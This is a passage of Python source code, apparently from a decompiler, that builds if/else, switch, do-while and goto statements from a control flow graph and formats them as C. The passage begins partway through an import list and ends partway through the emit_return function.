DefaultDict, Dict, List, Optional, Set, Tuple, Union\n\nfrom .flow_graph import (\n BasicNode,\n ConditionalNode,\n FlowGraph,\n Node,\n ReturnNode,\n SwitchNode,\n TerminalNode,\n)\nfrom .options import Options, Target\nfrom .translate import (\n BinaryOp,\n BlockInfo,\n CommaConditionExpr,\n Condition,\n Expression,\n Formatter,\n FunctionInfo,\n Literal,\n Statement as TrStatement,\n SwitchControl,\n early_unwrap_ints,\n format_expr,\n get_block_info,\n simplify_condition,\n)\nfrom .types import Type\n\n\n@dataclass\nclass Context:\n flow_graph: FlowGraph\n fmt: Formatter\n options: Options\n is_void: bool = True\n switch_nodes: Dict[Node, int] = field(default_factory=dict)\n case_nodes: DefaultDict[Node, List[Tuple[int, str]]] = field(\n default_factory=lambda: defaultdict(list)\n )\n goto_nodes: Set[Node] = field(default_factory=set)\n emitted_nodes: Set[Node] = field(default_factory=set)\n has_warned: bool = False\n\n\n@dataclass\nclass IfElseStatement:\n condition: Condition\n if_body: \"Body\"\n else_body: Optional[\"Body\"] = None\n\n def should_write(self) -> bool:\n return True\n\n def format(self, fmt: Formatter) -> str:\n space = fmt.indent(\"\")\n condition = simplify_condition(self.condition)\n cond_str = format_expr(condition, fmt)\n after_ifelse = f\"\\n{space}\" if fmt.coding_style.newline_after_if else \" \"\n before_else = f\"\\n{space}\" if fmt.coding_style.newline_before_else else \" \"\n with fmt.indented():\n if_str = \"\\n\".join(\n [\n f\"{space}if ({cond_str}){after_ifelse}{{\",\n self.if_body.format(fmt), # has its own indentation\n f\"{space}}}\",\n ]\n )\n if self.else_body is not None and not self.else_body.is_empty():\n sub_if = self.else_body.get_lone_if_statement()\n if sub_if:\n sub_if_str = sub_if.format(fmt).lstrip()\n else_str = f\"{before_else}else {sub_if_str}\"\n else:\n with fmt.indented():\n else_str = \"\\n\".join(\n [\n f\"{before_else}else{after_ifelse}{{\",\n self.else_body.format(fmt),\n f\"{space}}}\",\n ]\n )\n if_str = if_str + else_str\n return if_str\n\n\ndef comments_for_switch(index: int) -> List[str]:\n if index == 0:\n return []\n return [f\"switch {index}\"]\n\n\n@dataclass\nclass SwitchStatement:\n jump: SwitchControl\n body: \"Body\"\n # If there are multiple switch statements in a single function, each is given a\n # unique index starting at 1. This is used in comments to make control flow clear.\n index: int\n\n def should_write(self) -> bool:\n return True\n\n def format(self, fmt: Formatter) -> str:\n lines = []\n comments = []\n body_is_empty = self.body.is_empty()\n comments.extend(comments_for_switch(self.index))\n if self.jump.is_irregular:\n comments.append(\"irregular\")\n elif not self.jump.jump_table:\n comments.append(\"unable to parse jump table\")\n elif body_is_empty:\n comments.append(f\"jump table: {self.jump.jump_table.symbol_name}\")\n head = f\"switch ({format_expr(self.jump.control_expr, fmt)})\"\n if body_is_empty:\n lines.append(fmt.with_comments(f\"{head};\", comments))\n else:\n if fmt.coding_style.newline_after_if:\n lines.append(fmt.with_comments(f\"{head}\", comments))\n lines.append(fmt.indent(\"{\"))\n else:\n lines.append(fmt.with_comments(f\"{head} {{\", comments))\n with fmt.indented(fmt.coding_style.switch_indent_level):\n lines.append(self.body.format(fmt))\n lines.append(fmt.indent(\"}\"))\n return \"\\n\".join(lines)\n\n\n@dataclass\nclass SimpleStatement:\n contents: Optional[Union[str, TrStatement]]\n comments: List[str] = field(default_factory=list)\n is_jump: bool = False\n indent: int = 0\n\n def should_write(self) -> bool:\n return self.contents is not None or bool(self.comments)\n\n def format(self, fmt: Formatter) -> str:\n if self.contents is None:\n content = \"\"\n elif isinstance(self.contents, str):\n content = self.contents\n else:\n content = self.contents.format(fmt)\n\n return fmt.with_comments(content, self.comments, indent=self.indent)\n\n def clear(self) -> None:\n self.contents = None\n self.comments = []\n\n\n@dataclass\nclass LabelStatement:\n context: Context\n node: Node\n\n def should_write(self) -> bool:\n return self.node in self.context.goto_nodes or bool(\n self.context.case_nodes.get(self.node)\n )\n\n def format(self, fmt: Formatter) -> str:\n lines = []\n if self.node in self.context.case_nodes:\n for (switch, case_label) in self.context.case_nodes[self.node]:\n comments = comments_for_switch(switch)\n lines.append(fmt.with_comments(f\"{case_label}:\", comments, indent=-1))\n if self.node in self.context.goto_nodes:\n lines.append(f\"{label_for_node(self.context, self.node)}:\")\n return \"\\n\".join(lines)\n\n\n@dataclass\nclass DoWhileLoop:\n body: \"Body\"\n condition: Condition\n\n def should_write(self) -> bool:\n return True\n\n def format(self, fmt: Formatter) -> str:\n space = fmt.indent(\"\")\n after_do = f\"\\n{space}\" if fmt.coding_style.newline_after_if else \" \"\n cond = format_expr(simplify_condition(self.condition), fmt)\n with fmt.indented():\n return \"\\n\".join(\n [\n f\"{space}do{after_do}{{\",\n self.body.format(fmt),\n f\"{space}}} while ({cond});\",\n ]\n )\n\n\nStatement = Union[\n SimpleStatement,\n IfElseStatement,\n LabelStatement,\n SwitchStatement,\n DoWhileLoop,\n]\n\n\n@dataclass\nclass Body:\n print_node_comment: bool\n statements: List[Statement] = field(default_factory=list)\n\n def extend(self, other: \"Body\") -> None:\n \"\"\"Add the contents of `other` into ourselves\"\"\"\n self.print_node_comment |= other.print_node_comment\n self.statements.extend(other.statements)\n\n def add_node(self, node: Node, comment_empty: bool) -> None:\n block_info = get_block_info(node)\n statements = block_info.statements_to_write()\n\n # Add node header comment\n if self.print_node_comment and (statements or comment_empty):\n self.add_comment(f\"Node {node.name()}\")\n # Add node contents\n for item in statements:\n self.statements.append(SimpleStatement(item))\n\n def add_statement(self, statement: Statement) -> None:\n self.statements.append(statement)\n\n def add_comment(self, contents: str) -> None:\n self.add_statement(SimpleStatement(None, comments=[contents]))\n\n def add_if_else(self, if_else: IfElseStatement) -> None:\n if if_else.else_body is None or if_else.if_body.ends_in_jump():\n # We now know that we have an IfElseStatement like `if (A) { B; goto C; } else { D; }`\n # where `D` may be empty. We can rewrite this into `if (A) { B; goto C; } D;`\n # which reduces indentation to make the output more readable.\n\n # Append the final outermost `if_else`, without an `else_body` and rewritten to try\n # to avoid CommaConditionExprs.\n self.statements.append(rewrite_if_ands(if_else.condition, if_else.if_body))\n\n # Move the original `else_body` out of the block (if set)\n if if_else.else_body is not None:\n self.extend(if_else.else_body)\n else:\n # Simple case; perform no further rewrites\n self.statements.append(if_else)\n\n def add_do_while_loop(self, do_while_loop: DoWhileLoop) -> None:\n self.statements.append(do_while_loop)\n\n def add_switch(self, switch: SwitchStatement) -> None:\n self.add_statement(switch)\n\n def is_empty(self) -> bool:\n return not any(statement.should_write() for statement in self.statements)\n\n def ends_in_jump(self) -> bool:\n \"\"\"\n Returns True if the body ends in an unconditional jump (`goto` or `return`),\n which may allow for some syntax transformations.\n For example, this is True for bodies ending in a ReturnNode, because\n `return ...;` statements are marked with is_jump.\n This function is conservative: it only returns True if we're\n *sure* if the control flow won't continue past the Body boundary.\n \"\"\"\n for statement in self.statements[::-1]:\n if not statement.should_write():\n continue\n return isinstance(statement, SimpleStatement) and statement.is_jump\n return False\n\n def get_lone_if_statement(self) -> Optional[IfElseStatement]:\n \"\"\"If the body consists solely of one IfElseStatement, return it, else None.\"\"\"\n ret: Optional[IfElseStatement] = None\n for statement in self.statements:\n if statement.should_write():\n if not isinstance(statement, IfElseStatement) or ret:\n return None\n ret = statement\n return ret\n\n def elide_empty_returns(self) -> None:\n \"\"\"Remove `return;` statements from the end of the body.\n If the final statement is an if-else block, recurse into it.\"\"\"\n for statement in self.statements[::-1]:\n if (\n isinstance(statement, SimpleStatement)\n and statement.contents == \"return;\"\n ):\n statement.clear()\n if not statement.should_write():\n continue\n if isinstance(statement, IfElseStatement):\n statement.if_body.elide_empty_returns()\n if statement.else_body is not None:\n statement.else_body.elide_empty_returns()\n # We could also do this to SwitchStatements, but the generally\n # preferred style is to keep the final return/break\n break\n\n def format(self, fmt: Formatter) -> str:\n return \"\\n\".join(\n statement.format(fmt)\n for statement in self.statements\n if statement.should_write()\n )\n\n\ndef rewrite_if_ands(condition: Condition, if_body: \"Body\") -> IfElseStatement:\n \"\"\"\n Iterate through the left-heavy `&&`-joined subconditions in `condition`, checking\n or CommaConditionExprs. When encountered, convert the original if statement into\n a series of nested if's.\n\n This can transform input like: if (cond1 && cond2 && cond3) { if_body }\n into nested ifs like: if (cond1) { if (cond2) { if (cond3) { if_body } } }\n ...when `cond2` and `cond3` are CommaConditionExprs, which avoids the need for the comma operator.\n\n Warning: This rewrite is only valid if there is no else block in the original if\n statement, or if `if_body` ends in a jump.\n \"\"\"\n outer_cond: Condition = condition\n inner_conds: List[Condition] = []\n while (\n isinstance(outer_cond, BinaryOp)\n and isinstance(outer_cond.left, Condition)\n and outer_cond.op == \"&&\"\n and isinstance(outer_cond.right, Condition)\n ):\n # Move the iterator forward\n cond = outer_cond.right\n outer_cond = outer_cond.left\n\n if not isinstance(cond, CommaConditionExpr):\n inner_conds.append(cond)\n else:\n # Rewrite the CommaConditionExpr into a nested IfElseStatement.\n # Start by joining all of the iterated `inner_conds` together, following\n # the same left-heavy pattern used in try_make_if_condition.\n inner_cond = cond.condition\n while inner_conds:\n inner_cond = join_conditions(inner_cond, \"&&\", inner_conds.pop())\n\n # Split the `if` into two nested `if`s, to move the CommaConditionExpr and\n # all of the `inner_conds` into an inner if statement. After moving them,\n # we can drop them from the outer if statement (`condition`).\n new_body = Body(print_node_comment=if_body.print_node_comment)\n for stmt in cond.statements:\n new_body.add_statement(SimpleStatement(stmt))\n new_body.add_if_else(\n IfElseStatement(\n condition=inner_cond,\n if_body=if_body,\n else_body=None,\n )\n )\n if_body = new_body\n condition = outer_cond\n\n return IfElseStatement(condition=condition, if_body=if_body, else_body=None)\n\n\ndef label_for_node(context: Context, node: Node) -> str:\n if node.loop:\n return f\"loop_{node.block.index}\"\n else:\n return f\"block_{node.block.index}\"\n\n\ndef emit_node(context: Context, node: Node, body: Body) -> bool:\n \"\"\"\n Try to emit a node for the first time, together with a label for it.\n The label is only printed if something jumps to it, e.g. a loop.\n\n For return nodes, it's preferred to emit multiple copies, rather than\n goto'ing a single return statement.\n\n For other nodes that were already emitted, instead emit a goto.\n Since nodes represent positions in assembly, and we use phi's for preserved\n variable contents, this will end up semantically equivalent. This can happen\n sometimes when early returns/continues/|| are not detected correctly, and\n this hints at that situation better than if we just blindly duplicate the block\n \"\"\"\n if node in context.emitted_nodes:\n # TODO: Treating ReturnNode as a special case and emitting it repeatedly\n # hides the fact that we failed to fold the control flow. Maybe remove?\n if not isinstance(node, ReturnNode):\n emit_goto(context, node, body)\n return False\n else:\n body.add_comment(\n f\"Duplicate return node #{node.name()}. Try simplifying control flow for better match\"\n )\n else:\n body.add_statement(LabelStatement(context, node))\n context.emitted_nodes.add(node)\n\n body.add_node(node, comment_empty=True)\n if isinstance(node, ReturnNode):\n emit_return(context, node, body)\n return True\n\n\ndef emit_goto(context: Context, target: Node, body: Body) -> None:\n assert not isinstance(target, TerminalNode), \"cannot goto a TerminalNode\"\n label = label_for_node(context, target)\n context.goto_nodes.add(target)\n body.add_statement(SimpleStatement(f\"goto {label};\", is_jump=True))\n\n\ndef add_labels_for_switch(\n context: Context,\n node: Node,\n case_type: Type,\n cases: List[Tuple[int, Node]],\n default_node: Optional[Node],\n) -> int:\n assert cases, \"jtbl list must not be empty\"\n switch_index = context.switch_nodes[node]\n\n # Force hex for case labels if the highest label is above 50, and there are no negative labels\n indexes = sorted([i for i, _ in cases])\n use_hex = context.fmt.coding_style.hex_case or (\n min(indexes) >= 0 and max(indexes) > 50\n )\n\n # Keep track of which labels we skipped because they weren't required\n skipped_labels: List[Tuple[Node, Tuple[int, str]]] = []\n emitted_label_count = 0\n\n # Mark which labels we need to emit\n for index, target in cases:\n enum_name = case_type.get_enum_name(index)\n if enum_name:\n case_label = f\"case {enum_name}\"\n elif use_hex:\n if index < 0:\n case_label = f\"case -0x{-index:X}\"\n else:\n case_label = f\"case 0x{index:X}\"\n else:\n case_label = f\"case {index}\"\n\n # Do not emit extra `case N:` labels for the `default:` block, skip the\n # switch block entirely, or are just jumps to these kinds of nodes.\n if is_empty_goto(target, default_node) or is_empty_goto(\n target, node.immediate_postdominator\n ):\n skipped_labels.append((target, (switch_index, case_label)))\n else:\n context.case_nodes[target].append((switch_index, case_label))\n emitted_label_count += 1\n\n if default_node is not None:\n # `None` is a sentinel value to mark the `default:` block\n context.case_nodes[default_node].append((switch_index, \"default\"))\n emitted_label_count += 1\n\n # If a switch statement only has a few labels, the compiler will prefer to emit\n # a series of branches instead of using a jump table. It's sometimes possible to\n # force a jump table by including extra labels, even if they're redundant.\n # The exact threshold depends on the compiler & exact structure.\n # These labels may look redundant or be outside of the `switch (...) { ... }` block.\n if emitted_label_count < 5:\n for target, label in skipped_labels:\n context.case_nodes[target].append(label)\n\n return switch_index\n\n\ndef switch_guard_expr(node: Node) -> Optional[Expression]:\n \"\"\"\n Check if `node` is a ConditionalNode for checking the bounds of a SwitchNode's\n control expression. If it is, return the control expression, otherwise return None.\n ConditionalNodes matching this pattern can usually be combined with the successor\n SwitchNode in the output.\n \"\"\"\n if not isinstance(node, ConditionalNode):\n return None\n cond = get_block_info(node).branch_condition\n assert cond is not None\n\n switch_node = node.fallthrough_edge\n if not isinstance(switch_node, SwitchNode):\n return None\n switch_block_info = get_block_info(switch_node)\n assert switch_block_info.switch_control is not None\n\n # The SwitchNode must have no statements, and the conditional\n # from the ConditionalNode must properly check the jump table bounds.\n if (\n switch_node.parents == [node]\n and not switch_block_info.statements_to_write()\n and switch_block_info.switch_control.matches_guard_condition(cond)\n ):\n return switch_block_info.switch_control.control_expr\n return None\n\n\ndef is_empty_goto(node: Node, end: Optional[Node]) -> bool:\n \"\"\"Return True if `node` represents a jump to `end` without any other statements\"\"\"\n if end is None:\n return False\n seen_nodes = {node}\n while True:\n if node == end:\n return True\n block_info = get_block_info(node)\n if block_info.statements_to_write():\n return False\n if (\n isinstance(node, ReturnNode)\n and isinstance(end, TerminalNode)\n and block_info.return_value is None\n ):\n # An empty return counts as a jump to the TerminalNode\n return True\n elif isinstance(node, BasicNode):\n node = node.successor\n if node in seen_nodes:\n return False\n seen_nodes.add(node)\n else:\n return False\n return False\n\n\ndef gather_any_comma_conditions(block_info: BlockInfo) -> Condition:\n branch_condition = block_info.branch_condition\n assert branch_condition is not None\n comma_statements = block_info.statements_to_write()\n if comma_statements:\n assert not isinstance(branch_condition, CommaConditionExpr)\n return CommaConditionExpr(comma_statements, branch_condition)\n else:\n return branch_condition\n\n\n@dataclass(frozen=True)\nclass Bounds:\n \"\"\"\n Utility class for tracking possible switch control values across multiple\n conditional branches.\n \"\"\"\n\n lower: int = -(2**31) # `INT32_MAX`\n upper: int = (2**32) - 1 # `UINT32_MAX`\n holes: Set[int] = field(default_factory=set)\n\n def __post_init__(self) -> None:\n assert self.lower <= self.upper\n\n def without(self, hole: int) -> \"Bounds\":\n return replace(self, holes=self.holes | {hole})\n\n def at_most(self, val: int) -> \"Bounds\":\n if self.lower <= val <= self.upper:\n return replace(self, upper=val)\n elif val > self.upper:\n return self\n else:\n return Bounds.empty()\n\n def at_least(self, val: int) -> \"Bounds\":\n if self.lower <= val <= self.upper:\n return replace(self, lower=val)\n elif val < self.lower:\n return self\n else:\n return Bounds.empty()\n\n def values(self, *, max_count: int) -> Optional[List[int]]:\n values: List[int] = []\n for i in range(self.lower, self.upper + 1):\n if i not in self.holes:\n values.append(i)\n if len(values) > max_count:\n return None\n return values\n\n @staticmethod\n def empty() -> \"Bounds\":\n return Bounds(lower=0, upper=0, holes={0})\n\n\ndef try_make_if_condition(\n chained_cond_nodes: List[ConditionalNode], end: Node\n) -> Optional[Tuple[Condition, Node, Optional[Node]]]:\n \"\"\"\n Try to express the nodes in `chained_cond_nodes` as a single `Condition` `cond`\n to make an if-else statement. `end` is the immediate postdominator of the first\n node in `chained_cond_nodes`, and is the node following the if-else statement.\n\n Returns a tuple of `(cond, if_node, else_node)` representing:\n ```\n if (cond) {\n goto if_node;\n } else {\n goto else_node;\n }\n ```\n If `else_node` is `None`, then the else block is empty and can be omitted.\n\n This function returns `None` if the topology of `chained_cond_nodes` cannot\n be represented by a single `Condition`.\n \"\"\"\n start_node = chained_cond_nodes[0]\n if_node = chained_cond_nodes[-1].fallthrough_edge\n else_node: Optional[Node] = chained_cond_nodes[-1].conditional_edge\n assert else_node is not None\n\n # Check that all edges point \"forward\" to other nodes in the if statement\n # and translate this DAG of nodes into a dict we can easily modify\n allowed_nodes = set(chained_cond_nodes) | {if_node, else_node}\n node_cond_edges: Dict[ConditionalNode, Tuple[Condition, Node, Node]] = {}\n for node in chained_cond_nodes:\n if (\n node.conditional_edge not in allowed_nodes\n or node.fallthrough_edge not in allowed_nodes\n ):\n # Not a valid set of chained_cond_nodes\n return None\n allowed_nodes.remove(node)\n\n block_info = get_block_info(node)\n if node is start_node:\n # The first condition in an if-statement will have unrelated\n # statements in its to_write list, which our caller will already\n # have emitted. Avoid emitting them twice.\n cond = block_info.branch_condition\n assert isinstance(cond, Condition)\n else:\n # Otherwise, these statements will be added to the condition\n cond = gather_any_comma_conditions(block_info)\n\n node_cond_edges[node] = (cond, node.conditional_edge, node.fallthrough_edge)\n\n # Iteratively (try to) reduce the nodes into a single condition\n #\n # This is done through a process similar to \"Rule T2\" used in interval analysis\n # of control flow graphs, see ref. slides 17-21 of:\n # http://misailo.web.engr.illinois.edu/courses/526-sp17/lec1.pdf\n #\n # We have already ensured that all edges point forward (no loops), and there\n # are no incoming edges to internal nodes from outside the chain.\n #\n # Pick the first pair of nodes which form one of the 4 possible reducible\n # subgraphs, and then \"collapse\" them together by combining their conditions\n # and adjusting their edges. This process is repeated until no more changes\n # are possible, and is a success if there is exactly 1 condition left.\n while True:\n # Calculate the parents for each node in our subgraph\n node_parents: Dict[ConditionalNode, List[ConditionalNode]] = {\n node: [] for node in node_cond_edges\n }\n for node in node_cond_edges:\n for child in node_cond_edges[node][1:]:\n if child not in (if_node, else_node):\n assert isinstance(child, ConditionalNode)\n node_parents[child].append(node)\n\n # Find the first pair of nodes which form a reducible pair: one will always\n # be the *only* parent of the other.\n # Note: we do not include `if_node` or `else_node` in this search\n for child, parents in node_parents.items():\n if len(parents) != 1:\n continue\n parent = parents[0]\n child_cond, child_if, child_else = node_cond_edges[child]\n parent_cond, parent_if, parent_else = node_cond_edges[parent]\n\n # The 4 reducible subgraphs, see ref. slides 21-22 of:\n # https://www2.cs.arizona.edu/~collberg/Teaching/553/2011/Resources/ximing-slides.pdf\n # In summary:\n # - The child must have exactly one incoming edge, from the parent\n # - The parent's other edge must be in common with one of the child's edges\n # - Replace the condition with a combined condition from the two nodes\n # - Replace the parent's edges with the child's edges\n if parent_if is child_if and parent_else is child:\n parent_else = child_else\n cond = join_conditions(parent_cond, \"||\", child_cond)\n elif parent_if is child_else and parent_else is child:\n parent_else = child_if\n cond = join_conditions(parent_cond, \"||\", child_cond.negated())\n elif parent_if is child and parent_else is child_if:\n parent_if = child_else\n cond = join_conditions(parent_cond, \"&&\", child_cond.negated())\n elif parent_if is child and parent_else is child_else:\n parent_if = child_if\n cond = join_conditions(parent_cond, \"&&\", child_cond)\n else:\n continue\n\n # Modify the graph by replacing `parent`'s condition/edges, and deleting `child`\n node_cond_edges[parent] = (cond, parent_if, parent_else)\n node_cond_edges.pop(child)\n break\n else:\n # No pair was found, we're done!\n break\n\n # Were we able to collapse all conditions from chained_cond_nodes into one?\n if len(node_cond_edges) != 1 or start_node not in node_cond_edges:\n return None\n cond, left_node, right_node = node_cond_edges[start_node]\n\n # Negate the condition if the if/else nodes are backwards\n if (left_node, right_node) == (else_node, if_node):\n cond = cond.negated()\n else:\n assert (left_node, right_node) == (if_node, else_node)\n\n # Check if the if/else needs an else block\n if else_node is end:\n else_node = None\n elif if_node is end:\n # This is rare, but re-write if/else statements with an empty if body\n # from `if (cond) {} else { else_node; }` into `if (!cond) { else_node; }`\n cond = cond.negated()\n if_node = else_node\n else_node = None\n\n return (cond, if_node, else_node)\n\n\ndef try_build_irregular_switch(\n context: Context, start: Node, end: Node\n) -> Optional[SwitchStatement]:\n \"\"\"\n Look for irregular switch-like structures from nested ConditionalNodes & SwitchNodes.\n If one is found, return the corresponding SwitchStatement; otherwise, return None.\n\n Both IDO & GCC can convert switch statements into a tree of comparisons & jump tables.\n We try to identify the largest contiguous tree of ConditionalNodes & SwitchNodes that\n all compare the same variable (`var_expr`). SwitchNodes and `(x == N)` ConditionalNodes\n represent jumps to specific case labels, whereas comparisons like `(x < N)` are\n primarily used to manage the overall tree depth.\n \"\"\"\n # The start node must either be an if\n if not isinstance(start, ConditionalNode):\n return None\n\n assert end in start.postdominators\n start_block_info = get_block_info(start)\n control_expr = switch_guard_expr(start)\n var_expr: Optional[Expression] = None\n\n # Try to extract the switch's control expression\n if control_expr is not None:\n # `if (x >= len(jump_table))`: var_expr is `x`\n var_expr = control_expr\n elif start_block_info.branch_condition is not None:\n start_cond = simplify_condition(start_block_info.branch_condition)\n if (\n start_cond is not None\n and isinstance(start_cond, BinaryOp)\n and isinstance(start_cond.right, Literal)\n ):\n # `if (x == N)`: var_expr is `x`\n # The `start_cond.op` is checked in the first iter of the while loop below\n var_expr = start_cond.left\n if var_expr is None:\n return None\n\n # Unwrap EvalOnceExpr's and Cast's; ops like `<=` always include an `(s32)` cast\n uw_var_expr = early_unwrap_ints(var_expr)\n # Nodes we need to visit & their bounds, initially just the `start` node over a full int32\n node_queue: List[Tuple[Node, Bounds]] = [(start, Bounds())]\n # Nodes we have already visited, to avoid infinite loops\n visited_nodes: Set[Node] = set()\n # Nodes that have no statements, and should be marked as emitted if we emit a SwitchStatement.\n # A ConditionalNode like `if (x == N)` isn't directly emitted; it's replaced by a `case N:` label\n # This also includes empty BasicNodes & ReturnNodes that jump directly to the end\n nodes_to_mark_emitted: Set[Node] = set()\n # Map of label -> node. Similar to SwitchNode.cases, but the labels may not be contiguous\n cases: Dict[int, Node] = {}\n # The `default:`-labeled node, if found\n default_node: Optional[Node] = None\n # Number of \"irregular\" comparison nodes used (SwitchNodes & ConditionalNodes that aren't guards)\n irregular_comparison_count = 0\n\n while node_queue:\n node, bounds = node_queue.pop()\n if node in visited_nodes or node == end or node == default_node:\n continue\n visited_nodes.add(node)\n block_info = get_block_info(node)\n\n if node != start and block_info.statements_to_write():\n # Unless the node is the start node, it cannot have any statements to write\n pass\n\n elif is_empty_goto(node, end):\n # Empty returns/gotos are special cases: the compiler may have folded\n # this node together with one outside the original interval. So, this node\n # may fail the `start not in node.dominators` check below.\n # Otherwise, treat these like empty BasicNodes.\n nodes_to_mark_emitted.add(node)\n if isinstance(node, BasicNode):\n node_queue.append((node.successor, bounds))\n continue\n\n elif start not in node.dominators or end not in node.postdominators:\n # The node must be within the [start, end] interval\n pass\n\n elif isinstance(node, BasicNode):\n # This node has no statements, so it is just a goto\n nodes_to_mark_emitted.add(node)\n node_queue.append((node.successor, bounds))\n continue\n\n elif isinstance(node, ConditionalNode):\n # If this is a \"switch guard\" `if` statement, continue iterating on both branches\n control_expr = switch_guard_expr(node)\n if (\n control_expr is not None\n and early_unwrap_ints(control_expr) == uw_var_expr\n ):\n # We can get away without adjusting the bounds here, even though the switch guard\n # puts a hole in our bounds. If the switch guard covers the range `[n, m]` inclusive,\n # the fallthrough edge is a jump table for these values, and the jump table doesn't\n # need the bounds. On the conditional side, we would only need to accurately track the\n # bounds to find an `n-1` or `m+1` case; however, we can assume these don't exist,\n # because they could have been part of the jump table (instead of a separate conditional).\n node_queue.append((node.fallthrough_edge, bounds))\n node_queue.append((node.conditional_edge, bounds))\n nodes_to_mark_emitted.add(node)\n continue\n\n # Check if the branch_condition is a comparison between var_expr and a Literal\n assert block_info.branch_condition is not None\n cond = simplify_condition(block_info.branch_condition)\n if (\n isinstance(cond, BinaryOp)\n and isinstance(cond.right, Literal)\n and early_unwrap_ints(cond.left) == uw_var_expr\n ):\n # IDO typically uses `x == N` and `x < N` patterns in these if trees, but it\n # will use `x != N` when it needs to jump backwards to an already-emitted block.\n # GCC will more freely use either `x == N` or `x != N`.\n # Examples from PM: func_8026E558, pr_load_npc_extra_anims\n val = cond.right.value\n if cond.op == \"==\":\n if val in cases:\n return None\n cases[val] = node.conditional_edge\n node_queue.append((node.fallthrough_edge, bounds.without(val)))\n elif cond.op == \"!=\" and (\n node.block.index > node.conditional_edge.block.index\n or context.options.target.compiler != Target.CompilerEnum.IDO\n ):\n if val in cases:\n return None\n cases[val] = node.fallthrough_edge\n node_queue.append((node.conditional_edge, bounds.without(val)))\n elif cond.op == \"<\":\n node_queue.append((node.fallthrough_edge, bounds.at_least(val)))\n node_queue.append((node.conditional_edge, bounds.at_most(val - 1)))\n elif cond.op == \">=\":\n node_queue.append((node.fallthrough_edge, bounds.at_most(val - 1)))\n node_queue.append((node.conditional_edge, bounds.at_least(val)))\n elif cond.op == \"<=\":\n node_queue.append((node.fallthrough_edge, bounds.at_least(val + 1)))\n node_queue.append((node.conditional_edge, bounds.at_most(val)))\n elif cond.op == \">\":\n node_queue.append((node.fallthrough_edge, bounds.at_most(val)))\n node_queue.append((node.conditional_edge, bounds.at_least(val + 1)))\n else:\n return None\n irregular_comparison_count += 1\n nodes_to_mark_emitted.add(node)\n continue\n\n elif isinstance(node, SwitchNode):\n # The switch must use the same control expression\n if block_info.switch_control is None:\n return None\n if early_unwrap_ints(block_info.switch_control.control_expr) != uw_var_expr:\n return None\n # Add the cases from the inner switch to our dict of cases\n for i, case in enumerate(\n node.cases, start=block_info.switch_control.offset\n ):\n if i in cases:\n return None\n cases[i] = case\n nodes_to_mark_emitted.add(node)\n irregular_comparison_count += 1\n continue\n\n values = bounds.values(max_count=1)\n if values and context.options.target.compiler != Target.CompilerEnum.IDO:\n # The bounds only have a few possible values, so add this node to the set of cases\n # IDO won't make implicit cases like this, however.\n for value in values:\n if value in cases:\n return None\n cases[value] = node\n nodes_to_mark_emitted.add(node)\n continue\n\n # If we've gotten here, then the node is not a valid jump target for the switch,\n # unless it could be the `default:`-labeled node.\n if default_node is not None:\n return None\n if isinstance(node, ReturnNode) or (\n start in node.dominators and end in node.postdominators\n ):\n default_node = node\n\n # Need at least two irregular comparisons (to skip the regular ConditionalNode guard + SwitchNode pairs)\n # Need to combine at least 3 nodes into 2 distinct cases, otherwise it could be a plain if/else with ||\n if (\n irregular_comparison_count < 2\n or len(nodes_to_mark_emitted) < 3\n or len(set(cases.values())) < 2\n ):\n return None\n\n # If this new irregular switch uses all of the other switch nodes in the function,\n # then we no longer need to add labelling comments with the switch_index\n for n in nodes_to_mark_emitted:\n context.switch_nodes.pop(n, None)\n if context.switch_nodes:\n switch_index = max(context.switch_nodes.values()) + 1\n else:\n switch_index = 0\n context.switch_nodes[start] = switch_index\n\n add_labels_for_switch(\n context,\n start,\n var_expr.type,\n cases=list(cases.items()),\n default_node=default_node,\n )\n\n case_nodes = list(cases.values())\n if default_node is not None:\n case_nodes.append(default_node)\n switch = build_switch_statement(\n context,\n SwitchControl.irregular_from_expr(var_expr),\n case_nodes,\n switch_index,\n end,\n )\n context.emitted_nodes |= nodes_to_mark_emitted\n return switch\n\n\ndef build_conditional_subgraph(\n context: Context, start: ConditionalNode, end: Node\n) -> IfElseStatement:\n \"\"\"\n Output the subgraph between `start` and `end`, including the branch condition\n in the ConditionalNode `start`.\n\n This function detects \"plain\" if conditions, as well as conditions containing\n nested && and || terms.\n\n As generated by IDO and GCC, conditions with && and || terms are emitted in a\n very particular way. There will be a \"chain\" ConditionalNodes, where each node\n falls through to the next node in the chain.\n Each conditional edge from the nodes in this chain will go to one of:\n - The head of the if block body (`if_node`)\n - The head of the else block body (`else_node`)\n - A *later* conditional node in the chain (no loops)\n\n We know IDO likes to emit the assembly for basic blocks in the same order that\n they appear in the C source. So, we generally call the fallthrough of the final\n ConditionNode the `if_node` (unless it is empty). By construction, it will be\n an earlier node than the `else_node`.\n \"\"\"\n # Find the longest fallthrough chain of ConditionalNodes.\n # This is the starting point for finding the complex &&/|| Condition\n # The conditional edges will be checked in later step\n curr_node: Node = start\n chained_cond_nodes: List[ConditionalNode] = []\n while True:\n assert isinstance(curr_node, ConditionalNode)\n chained_cond_nodes.append(curr_node)\n curr_node = curr_node.fallthrough_edge\n if not (\n # If &&/|| detection is disabled, then limit the condition to one node\n context.options.andor_detection\n # Only include ConditionalNodes\n and isinstance(curr_node, ConditionalNode)\n # Only include nodes that are postdominated by `end`\n and end in curr_node.postdominators\n # Exclude the `end` node\n and end is not curr_node\n # Exclude any loop nodes (except `start`)\n and not curr_node.loop\n # Exclude nodes with incoming edges that are not part of the condition\n and all(p in chained_cond_nodes for p in curr_node.parents)\n # Exclude guards for SwitchNodes (they may be elided)\n and not switch_guard_expr(curr_node)\n ):\n break\n\n # We want to take the largest chain of ConditionalNodes that can be converted to\n # a single condition with &&'s and ||'s. We start with the largest chain computed\n # above, and then trim it until it meets this criteria. The resulting chain will\n # always have at least one node.\n while True:\n assert chained_cond_nodes\n cond_result = try_make_if_condition(chained_cond_nodes, end)\n if cond_result:\n break\n # Shorten the chain by removing the last node, then try again.\n chained_cond_nodes.pop()\n cond, if_node, else_node = cond_result\n\n # Mark nodes that may have comma expressions in `cond` as emitted\n context.emitted_nodes.update(chained_cond_nodes[1:])\n\n # Build the if & else bodies\n else_body: Optional[Body] = None\n if else_node:\n else_body = build_flowgraph_between(context, else_node, end)\n if_body = build_flowgraph_between(context, if_node, end)\n\n return IfElseStatement(cond, if_body, else_body)\n\n\ndef join_conditions(left: Condition, op: str, right: Condition) -> Condition:\n assert op in [\"&&\", \"||\"]\n return BinaryOp(left, op, right, type=Type.bool())\n\n\ndef emit_return(context: Context, node: ReturnNode, body: Body) -> None:\n ret_info = get_block_info(node)\n\n ret = ret_info.return_value\n if ret is not None:\n ret_str = format_expr(ret, 